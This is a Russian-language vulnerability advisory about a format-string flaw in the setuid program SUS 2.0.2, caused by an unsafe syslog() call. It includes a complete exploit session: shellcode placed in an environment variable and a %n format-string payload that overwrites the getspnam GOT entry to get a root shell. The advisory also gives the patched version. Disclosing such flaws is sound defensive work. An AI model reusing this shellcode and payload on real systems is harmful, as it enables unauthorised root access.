Поднятие локальных привилегий в SUS

Дата публикации:
16.09.2004
Всего просмотров:
834
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: SUS 2.0.2

Описание: Уязвимость форматной строки обнаружена в SUS . Локальный пользователь может получить root привилегии на системе.

Локальный пользователь может представить специально обработанный параметр командной строки, чтобы выполнить произвольный код с root привилегиями. Уязвимость связанна с некорректным вызовов syslog() в функции log() в 'log.c'.

Пример/Эксплоит:

getspnam() address -> 08061780 
HACK variable address -> 0xbffffb54

[root@laptop root]# objdump -R /usr/bin/sus | grep getspnam
08061780 R_386_JUMP_SLOT getspnam
[root@laptop root]# su ljuranic
[ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print 
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\xcd\x80"'`
[ljuranic@laptop ljuranic]$ ./env HACK
bffffb54
[ljuranic@laptop ljuranic]$ id
uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic)
[ljuranic@laptop ljuranic]$ sus -V
Version 2.0.2
[ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus 
-rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus
[ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06
\x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259
\\$n%.192u%260\\$n"'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a#

URL производителя: http://pdg.uow.edu.au/sus/

Решение:Установите обновленную версию программы: http://pdg.uow.edu.au/sus/sus-2.0.6.tar.Z

Ссылки: SUS 2.0.2 local root vulnerability

или введите имя

CAPTCHA